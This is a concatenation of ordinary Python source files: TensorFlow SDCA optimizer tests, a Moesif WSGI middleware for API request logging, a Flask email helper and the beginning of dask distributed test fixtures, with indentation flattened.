loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
# \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
# turns out that the optimal (variable) weights are given by:
# w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
# w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
# In this case the (unnormalized regularized) loss will be:
# s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9. The
# actual loss should be further normalized by the sum of example weights.
self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
class SdcaWithHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and minimizing
# wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This gives 0.0
# unregularized loss and 0.25 L2 loss.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllEqual([-1.0, 1.0], predictions.eval())
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.0, unregularized_loss.eval())
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)
def testDenseFeaturesPerfectlySeparable(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
# (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
# the SVM's functional margin >=1), so the unregularized loss is ~0.0.
# There is only loss due to l2-regularization. For these datapoints, it
# turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesSeparableWithinMargins(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
# are within the margins so there is unregularized loss (1/2 per example).
# For these datapoints, optimal weights are w_1~=0.0 and w_2~=1.0 which
# gives an L2 loss of ~0.25.
self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesWeightedExamples(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
weights=[3.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
# try to increase the margin from (1.0, 0.5). Due to regularization,
# (1.0, -0.5) will be within the margin. For these points and example
# weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an L2
# loss of 0.5 * 0.25 * 0.25 * 1.6 = 0.2. The binary predictions will be
# correct, but the boundary will be much closer to the 2nd point than the
# first one.
self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
class SdcaWithSmoothHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for smooth hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='smooth_hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3. This gives
# an unregularized hinge loss of 0.33 and a 0.11 L2 loss
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
class SdcaWithPoissonLossTest(SdcaModelTest):
"""SDCA optimizer test class for poisson loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 2),
]
example_weights = [100.0, 100.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='poisson_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 1 for each example.
predictions = model.predictions(examples)
self.assertAllClose([1.0, 1.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
approximate_duality_gap = model.approximate_duality_gap()
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
# (say w3 and w4). The minimization leads to:
# w1=w3=-1.96487, argmin of 100*(exp(2*w)-2*w*0)+w**2.
# w2=w4=0.345708, argmin of 100*(exp(2*w)-2*w*2)+w**2.
# This gives an unregularized loss of .3167 and .3366 with regularization.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([0.0196, 1.9965], predictions.eval(), atol=1e-4)
self.assertAllClose(0.3167, unregularized_loss.eval(), atol=1e-4)
self.assertAllClose(0.3366, regularized_loss.eval(), atol=1e-4)
self.assertAllClose(0., approximate_duality_gap.eval(), atol=1e-6)
class SdcaFprintTest(SdcaModelTest):
"""Tests for the SdcaFprint op.
This is one way of enforcing the platform-agnostic nature of SdcaFprint.
Basically we are checking against exact values and this test could be running
across different platforms. Note that it is fine for expected values to change
in the future, if the implementation of SdcaFprint changes (ie this is *not* a
frozen test).
"""
def testFprint(self):
with self._single_threaded_test_session():
in_data = constant_op.constant(['abc', 'very looooooong string', 'def'])
out_data = gen_sdca_ops.sdca_fprint(in_data)
self.assertAllEqual([[4143508125394299908, -6879828354153669051],
[5849691694103072671, -4874542629849009556],
[603227410218889250, 8762207001949257490]],
out_data.eval())
if __name__ == '__main__':
googletest.main()
|
middleware.py
|
# -*- coding: utf-8 -*-
import time
import datetime
import threading
import json
import base64
import re
import random
import itertools
from cStringIO import StringIO
from moesifapi.moesif_api_client import *
from moesifapi.api_helper import *
from moesifapi.exceptions.api_exception import *
from moesifapi.models import *
from .http_response_catcher import HttpResponseCatcher
from moesifpythonrequest.start_capture.start_capture import StartCapture
class DataHolder(object):
"""Capture the data for a request-response."""
def __init__(self, id, method, url, ip, user_id, metadata, session_token, request_headers, content_length, request_body):
self.request_id = id
self.method = method
self.url = url
self.ip_address = ip
self.user_id = user_id
self.metadata = metadata
self.session_token = session_token
self.request_headers = request_headers
self.content_length = content_length
self.request_body = request_body
self.status = -1
self.response_headers = None
self.response_chunks = None
self.response_body_data = None
self.request_time = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
self.start_at = time.time()
def capture_response_status(self, status, response_headers):
self.status = status
self.response_headers = response_headers
def capture_body_data(self, body_data):
if self.response_body_data is None:
self.response_body_data = body_data
else:
self.response_body_data = self.response_body_data + body_data
def finish_response(self, response_chunks):
self.response_time = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
self.response_chunks = response_chunks
new_response_chunks = []
stored_response_chunks = []
for line in response_chunks:
new_response_chunks.append(line)
stored_response_chunks.append(line)
self.response_chunks = stored_response_chunks
return new_response_chunks
class MoesifMiddleware(object):
"""WSGI Middleware for recording of request-response"""
def __init__(self, app, settings):
self.app = app
self.request_counter = itertools.count().next # Threadsafe counter
self.ipv4 = r"^(?:(?:\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])$"
self.ipv6 = r"^((?=.*::)(?!.*::.+::)(::)?([\dA-F]{1,4}:(:|\b)|){5}|([\dA-F]{1,4}:){6})((([\dA-F]{1,4}((?!\3)::|:\b|$))|(?!\2\3)){2}|(((2[0-4]|1\d|[1-9])?\d|25[0-5])\.?\b){4})$/i"
if settings is None:
raise Exception('Moesif Application ID is required in settings')
self.settings = settings
if settings.get('APPLICATION_ID', None):
self.client = MoesifAPIClient(settings.get('APPLICATION_ID'))
else:
raise Exception('Moesif Application ID is required in settings')
if settings.get('DEBUG', False):
Configuration.BASE_URI = settings.get('LOCAL_MOESIF_BASEURL', 'https://api.moesif.net')
self.DEBUG = settings.get('DEBUG', False)
if settings.get('CAPTURE_OUTGOING_REQUESTS', False):
try:
if self.DEBUG:
print('Start capturing outgoing requests')
# Start capturing outgoing requests
StartCapture().start_capture_outgoing(settings)
except:
print('Error while starting to capture the outgoing events')
self.api_version = settings.get('API_VERSION')
self.api_client = self.client.api
self.regex_http_ = re.compile(r'^HTTP_.+$')
self.regex_content_type = re.compile(r'^CONTENT_TYPE$')
self.regex_content_length = re.compile(r'^CONTENT_LENGTH$')
if self.DEBUG:
response_catcher = HttpResponseCatcher()
self.api_client.http_call_back = response_catcher
def __call__(self, environ, start_response):
data_holder = DataHolder(
self.request_counter(),
environ['REQUEST_METHOD'],
self.request_url(environ),
self.get_client_address(environ),
self.get_user_id(environ),
self.get_metadata(environ),
self.get_session_token(environ),
[(k, v) for k,v in self.parse_request_headers(environ)],
*self.request_body(environ)
)
def _start_response(status, response_headers, *args):
# Capture status and response_headers for later processing
data_holder.capture_response_status(status, response_headers)
return start_response(status, response_headers, *args)
# data.capture_response_status(status, response_headers)
# write = start_response(status, response_headers, *args)
# def my_write(body_data):
# data.capture_body_data(body_data)
# print('inside my_write')
# print(body_data)
# write(body_data)
# return my_write
response_chunks = data_holder.finish_response(self.app(environ, _start_response))
def background_process():
try:
self.process_data(data_holder)
except Exception as e:
if self.DEBUG:
print('failed processing data but move on')
print(e)
# return data to WSGI server
try:
return response_chunks
finally:
#background_process()
if not self.should_skip(environ):
sampling_percentage = float(self.settings.get("SAMPLING_PERCENTAGE", 100))
random_percentage = random.random() * 100
if sampling_percentage >= random_percentage:
sending_background_thread = threading.Thread(target=background_process)
sending_background_thread.start()
else:
if self.DEBUG:
print('skipped')
def process_data(self, data):
req_body = None
req_body_transfer_encoding = None
try:
if self.DEBUG:
print("about to process request body" + data.request_body)
if data.request_body:
req_body = json.loads(data.request_body)
except:
if data.request_body:
req_body = base64.standard_b64encode(data.request_body)
req_body_transfer_encoding = 'base64'
req_headers = None
if data.request_headers:
req_headers = dict(data.request_headers)
event_req = EventRequestModel(time=data.request_time,
uri=data.url,
verb=data.method,
api_version=self.api_version,
ip_address=data.ip_address,
headers=req_headers,
body=req_body,
transfer_encoding=req_body_transfer_encoding)
response_content = None
try:
response_content = "".join(data.response_chunks)
except:
if self.DEBUG:
print('try to join response chunks failed')
rsp_body = None
rsp_body_transfer_encoding = None
if self.DEBUG:
print("about to process response")
print(response_content)
if response_content:
try:
rsp_body = json.loads(response_content)
if self.DEBUG:
print("jason parsed succesfully")
except:
if self.DEBUG:
print("could not json parse, so base64 encode")
rsp_body = base64.standard_b64encode(response_content)
rsp_body_transfer_encoding = 'base64'
if self.DEBUG:
print("base64 encoded body: " + rsp_body)
rsp_headers = None
if data.response_headers:
rsp_headers = dict(data.response_headers)
response_status = None
if data.status:
response_status = int(data.status[:3])
event_rsp = EventResponseModel(time=data.response_time,
status=response_status,
headers=rsp_headers,
body=rsp_body,
transfer_encoding=rsp_body_transfer_encoding)
event_model = EventModel(request=event_req,
response=event_rsp,
user_id=data.user_id,
session_token=data.session_token,
metadata=data.metadata)
try:
mask_event_model = self.settings.get("MASK_EVENT_MODEL")
if mask_event_model is not None:
event_model = mask_event_model(event_model)
except:
if self.DEBUG:
print("Can not execute MASK_EVENT_MODEL function. Please check moesif settings.")
if self.DEBUG:
print("sending event to moesif")
print(APIHelper.json_serialize(event_model))
try:
self.api_client.create_event(event_model)
if self.DEBUG:
print("sent done")
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error sending event to Moesif, with status code:")
print(inst.response_code)
def is_ip(self, value):
return re.match(self.ipv4, value) or re.match(self.ipv6, value)
def getClientIpFromXForwardedFor(self, value):
try:
value = value.encode('utf-8')
if value is None:
return None
if not isinstance(value, str):
raise TypeError("Expected a string, got -" + str(type(value)))
# x-forwarded-for may return multiple IP addresses in the format:
# "client IP, proxy 1 IP, proxy 2 IP"
# Therefore, the right-most IP address is the IP address of the most recent proxy
# and the left-most IP address is the IP address of the originating client.
# source: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/x-forwarded-headers.html
# Azure Web App's also adds a port for some reason, so we'll only use the first part (the IP)
forwardedIps = []
for e in value.split(','):
ip = e.strip()
if ':' in ip:
splitted = ip.split(':')
if (len(splitted) == 2):
forwardedIps.append(splitted[0])
forwardedIps.append(ip)
# Sometimes IP addresses in this header can be 'unknown' (http://stackoverflow.com/a/11285650).
# Therefore taking the left-most IP address that is not unknown
# A Squid configuration directive can also set the value to "unknown" (http://www.squid-cache.org/Doc/config/forwarded_for/)
return next(item for item in forwardedIps if self.is_ip(item))
except StopIteration:
return value.encode('utf-8')
def get_client_address(self, environ):
try:
# Standard headers used by Amazon EC2, Heroku, and others.
if 'HTTP_X_CLIENT_IP' in environ:
if self.is_ip(environ['HTTP_X_CLIENT_IP']):
return environ['HTTP_X_CLIENT_IP']
# Load-balancers (AWS ELB) or proxies.
if 'HTTP_X_FORWARDED_FOR' in environ:
xForwardedFor = self.getClientIpFromXForwardedFor(environ['HTTP_X_FORWARDED_FOR'])
if self.is_ip(xForwardedFor):
return xForwardedFor
# Cloudflare.
# @see https://support.cloudflare.com/hc/en-us/articles/200170986-How-does-Cloudflare-handle-HTTP-Request-headers-
# CF-Connecting-IP - applied to every request to the origin.
if 'HTTP_CF_CONNECTING_IP' in environ:
if self.is_ip(environ['HTTP_CF-CONNECTING_IP']):
return environ['HTTP_CF_CONNECTING_IP']
# Akamai and Cloudflare: True-Client-IP.
if 'HTTP_TRUE_CLIENT_IP' in environ:
if self.is_ip(environ['HTTP_TRUE_CLIENT_IP']):
return environ['HTTP_TRUE_CLIENT_IP']
# Default nginx proxy/fcgi; alternative to x-forwarded-for, used by some proxies.
if 'HTTP_X_REAL_IP' in environ:
if self.is_ip(environ['HTTP_X_REAL_IP']):
return environ['HTTP_X_REAL_IP']
# (Rackspace LB and Riverbed's Stingray)
# http://www.rackspace.com/knowledge_center/article/controlling-access-to-linux-cloud-sites-based-on-the-client-ip-address
# https://splash.riverbed.com/docs/DOC-1926
if 'HTTP_X_CLUSTER_CLIENT_IP' in environ:
if self.is_ip(environ['HTTP_X_CLUSTER_CLIENT_IP']):
return environ['HTTP_X_CLUSTER_CLIENT_IP']
if 'HTTP_X_FORWARDED' in environ:
if self.is_ip(environ['HTTP_X_FORWARDED']):
return environ['HTTP_X_FORWARDED']
if 'HTTP_FORWARDED_FOR' in environ:
if self.is_ip(environ['HTTP_FORWARDED_FOR']):
return environ['HTTP_FORWARDED_FOR']
if 'HTTP_FORWARDED' in environ:
if self.is_ip(environ['HTTP_FORWARDED']):
return environ['HTTP_FORWARDED']
return environ['REMOTE_ADDR']
except KeyError:
return environ['REMOTE_ADDR']
def get_user_id(self, environ):
username = None
try:
identify_user = self.settings.get("IDENTIFY_USER")
if identify_user is not None:
username = identify_user(self.app, environ)
except Exception as e:
if self.DEBUG:
print("can not execute identify_user function, please check moesif settings.")
print(e)
return username
def get_metadata(self, environ):
metadata = None
try:
get_meta = self.settings.get("GET_METADATA")
if get_meta is not None:
metadata = get_meta(self.app, environ)
except Exception as e:
if self.DEBUG:
print("can not execute GET_METADATA function, please check moesif settings.")
print(e)
return metadata
def get_session_token(self, environ):
session_token = None
# try the standard method for getting session id.
# if 'HTTP_COOKIE' in environ:
# cookie = {s.split('=')[0].strip(): s.split('=')[1].strip() for s in environ['HTTP_COOKIE'].split(';')}
# session_token = cookie['sessionid']
# then see if get_session_token is implemented.
try:
get_session = self.settings.get("GET_SESSION_TOKEN")
if get_session is not None:
session_token = get_session(self.app, environ)
except Exception as e:
if self.DEBUG:
print("can not execute get_session function, please check moesif settings.")
print(e)
return session_token
def should_skip(self, environ):
try:
skip_proc = self.settings.get("SKIP")
if skip_proc is not None:
return skip_proc(self.app, environ)
else:
return False
except:
if self.DEBUG:
print("error trying to execute skip function.")
return False
def request_url(self, environ):
return '{0}{1}{2}'.format(
environ.get('SCRIPT_NAME', ''),
environ.get('PATH_INFO', ''),
'?' + environ['QUERY_STRING'] if environ.get('QUERY_STRING') else '',
)
_parse_headers_special = {
'HTTP_CGI_AUTHORIZATION': 'Authorization',
'CONTENT_LENGTH': 'Content-Length',
'CONTENT_TYPE': 'Content-Type',
}
def parse_request_headers(self, environ):
for cgi_var, value in environ.iteritems():
if cgi_var in self._parse_headers_special:
yield self._parse_headers_special[cgi_var], value
elif cgi_var.startswith('HTTP_'):
yield cgi_var[5:].title().replace('_', '-'), value
def request_body(self, environ):
content_length = environ.get('CONTENT_LENGTH')
body = None
if content_length:
if content_length == '-1':
# case where the content length is basically undetermined
body = environ['wsgi.input'].read(-1)
content_length = len(body)
else:
content_length = int(content_length)
body = environ['wsgi.input'].read(content_length)
environ['wsgi.input'] = StringIO(body) # reset request body for the nested app
else:
content_length = 0
return content_length, body
def update_user(self, user_profile):
if not user_profile:
print('Expecting the input to be either of the type - UserModel, dict or json while updating user')
else:
if isinstance(user_profile, dict):
if 'user_id' in user_profile:
try:
self.api_client.update_user(UserModel.from_dictionary(user_profile))
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error while updating user, with status code:")
print(inst.response_code)
else:
print('To update an user, an user_id field is required')
elif isinstance(user_profile, UserModel):
if user_profile.user_id is not None:
try:
self.api_client.update_user(user_profile)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error while updating user, with status code:")
print(inst.response_code)
else:
print('To update an user, an user_id field is required')
else:
try:
user_profile_json = APIHelper.json_deserialize(user_profile)
if 'user_id' in user_profile_json:
try:
self.api_client.update_user(UserModel.from_dictionary(user_profile_json))
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error while updating user, with status code:")
print(inst.response_code)
else:
print('To update an user, an user_id field is required')
except:
print('Error while deserializing the json, please make sure the json is valid')
def update_users_batch(self, user_profiles):
if not user_profiles:
print('Expecting the input to be either of the type - List of UserModel, dict or json while updating users')
else:
if all(isinstance(user, dict) for user in user_profiles):
if all('user_id' in user for user in user_profiles):
try:
batch_profiles = [UserModel.from_dictionary(d) for d in user_profiles]
self.api_client.update_users_batch(batch_profiles)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error while updating users, with status code:")
print(inst.response_code)
else:
print('To update users, an user_id field is required')
elif all(isinstance(user, UserModel) for user in user_profiles):
if all(user.user_id is not None for user in user_profiles):
try:
self.api_client.update_users_batch(user_profiles)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error while updating users, with status code:")
print(inst.response_code)
else:
print('To update users, an user_id field is required')
else:
try:
user_profiles_json = [APIHelper.json_deserialize(d) for d in user_profiles]
if all(isinstance(user, dict) for user in user_profiles_json) and all('user_id' in user for user in user_profiles_json):
try:
batch_profiles = [UserModel.from_dictionary(d) for d in user_profiles_json]
self.api_client.update_users_batch(batch_profiles)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error while updating users, with status code:")
print(inst.response_code)
else:
print('To update users, an user_id field is required')
except:
print('Error while deserializing the json, please make sure the json is valid')
|
email.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : Jianwei Fu
# E-mail : jianwei1031@gmail.com
# Date : 15/12/26 20:34:22
# Desc :
#
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
# mail.send(msg)
|
utils_test.py
|
from __future__ import annotations
import asyncio
import copy
import functools
import gc
import inspect
import io
import logging
import logging.config
import multiprocessing
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import weakref
from collections import defaultdict
from collections.abc import Callable
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from itertools import count
from time import sleep
from typing import Any, Literal
from distributed.compatibility import MACOS
from distributed.scheduler import Scheduler
try:
import ssl
except ImportError:
ssl = None # type: ignore
import pytest
import yaml
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from distributed.comm.tcp import TCP
from . import system
from . import versions as version_module
from .client import Client, _global_clients, default_client
from .comm import Comm
from .comm.tcp import BaseTCPConnector
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, ConnectionPool, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .node import ServerNode
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
)
from .worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
